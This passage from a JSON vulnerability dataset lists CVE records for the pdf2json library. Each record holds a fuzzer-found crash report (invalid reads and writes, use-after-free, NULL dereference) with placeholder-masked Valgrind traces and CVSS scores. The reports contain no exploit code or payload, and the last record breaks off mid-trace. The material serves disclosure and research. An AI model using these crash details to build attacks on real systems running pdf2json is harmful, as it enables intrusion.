  51397. "description": "Segmentation fault on APITAG Hi, Our fuzzer found a crash due to an invalid read on the function APITAG APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG B: APITAG short , int , unsigned char ) (in PATHTAG NUMBERTAG by NUMBERTAG B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FB6: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG fd NUMBERTAG is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG FD NUMBERTAG at NUMBERTAG B: APITAG short , int , unsigned char ) (in PATHTAG NUMBERTAG by NUMBERTAG B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FB6: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
  51398. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51399. "severity": "MEDIUM",
  51400. "baseScore": 5.5,
  51401. "impactScore": 3.6,
  51402. "exploitabilityScore": 1.8
  51403. },
  51404. {
  51405. "CVE_ID": "CVE-2020-19467",
  51406. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/28",
  51407. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/28",
  51408. "Repo_new": "flexpaper/pdf2json",
  51409. "Issue_Created_At": "2019-05-28T05:41:37Z",
  51410. "description": "Segmentation fault (use after free) on APITAG Hi, Our fuzzer found a crash due to an Use After Free bug on the function APITAG (the latest commit b NUMBERTAG b NUMBERTAG on master version NUMBERTAG APITAG URLTAG Valgrind says: ~~~ pdf2json APITAG /dev/null NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG short , int , unsigned char ) (in PATHTAG NUMBERTAG by NUMBERTAG B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E8: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A5B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C8: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG BE: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG c NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG D: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG D: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG D: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG D: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG D: APITAG (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG BE: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG BE: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG BE: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG BE: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG BE: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG BE: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG B: APITAG short , int , unsigned char ) (in PATHTAG NUMBERTAG by NUMBERTAG B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E8: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A5B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C8: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG BE: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG ff NUMBERTAG c is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG FF NUMBERTAG C NUMBERTAG at NUMBERTAG B: APITAG short , int , unsigned char ) (in PATHTAG NUMBERTAG by NUMBERTAG B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E8: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A5B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C8: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG BE: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
  51411. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51412. "severity": "MEDIUM",
  51413. "baseScore": 5.5,
  51414. "impactScore": 3.6,
  51415. "exploitabilityScore": 1.8
  51416. },
  51417. {
  51418. "CVE_ID": "CVE-2020-19468",
  51419. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/29",
  51420. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/29",
  51421. "Repo_new": "flexpaper/pdf2json",
  51422. "Issue_Created_At": "2019-05-28T05:57:15Z",
  51423. "description": "Segmentation fault (NULL pointer dereference) on APITAG Hi, Our fuzzer found a crash due to a NULL pointer dereference bug on the function APITAG (the latest commit b NUMBERTAG b NUMBERTAG on master version NUMBERTAG APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Error: May not be a PDF file (continuing anyway) Error: PDF file is damaged attempting to reconstruct xref table... Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Illegal character ')' Error: Unterminated string Error: Bad image parameters NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG ECFA: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG at NUMBERTAG ECFA: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
  51424. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51425. "severity": "MEDIUM",
  51426. "baseScore": 5.5,
  51427. "impactScore": 3.6,
  51428. "exploitabilityScore": 1.8
  51429. },
  51430. {
  51431. "CVE_ID": "CVE-2020-19469",
  51432. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/30",
  51433. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/30",
  51434. "Repo_new": "flexpaper/pdf2json",
  51435. "Issue_Created_At": "2019-05-28T06:47:45Z",
  51436. "description": "Segmentation fault on APITAG Hi, Our fuzzer found a crash due to an invalid write on the function APITAG (the latest commit b NUMBERTAG b NUMBERTAG on master version NUMBERTAG APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Error NUMBERTAG Illegal character ')' Error: PDF file is damaged attempting to reconstruct xref table... Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Illegal character '>' Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG D2D: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b1b NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG CF NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Conditional jump or move depends on uninitialised value(s NUMBERTAG at NUMBERTAG A NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG B NUMBERTAG APITAG , APITAG , int , int ) (in PATHTAG NUMBERTAG by NUMBERTAG CF: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FB6: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DF: APITAG , Lexer , int) (in PATHTAG NUMBERTAG by NUMBERTAG F8: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Error NUMBERTAG Bad Huffman code in DCT stream NUMBERTAG Use of uninitialised value of size NUMBERTAG at NUMBERTAG ACFE: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG BEB: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A5AA: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG ACFE: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG BEB: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A5AA: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG at NUMBERTAG ACFE: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG BEB: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A5AA: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG Use track origins=yes to see where uninitialised values come from NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
  51437. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51438. "severity": "MEDIUM",
  51439. "baseScore": 5.5,
  51440. "impactScore": 3.6,
  51441. "exploitabilityScore": 1.8
  51442. },
  51443. {
  51444. "CVE_ID": "CVE-2020-19470",
  51445. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/31",
  51446. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/31",
  51447. "Repo_new": "flexpaper/pdf2json",
  51448. "Issue_Created_At": "2019-05-28T08:53:18Z",
  51449. "description": "Segmentation fault (NULL pointer dereference) on APITAG Hi, Our fuzzer found a crash due to a NULL pointer dereference bug on the function APITAG (the latest commit b NUMBERTAG b NUMBERTAG on master version NUMBERTAG APITAG URLTAG ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Error NUMBERTAG Badly formatted number Error: PDF file is damaged attempting to reconstruct xref table... Error NUMBERTAG Illegal character '>' Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Illegal character '>' Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DF: APITAG , Lexer , int) (in PATHTAG NUMBERTAG by NUMBERTAG F8: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DF: APITAG , Lexer , int) (in PATHTAG NUMBERTAG by NUMBERTAG F8: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks 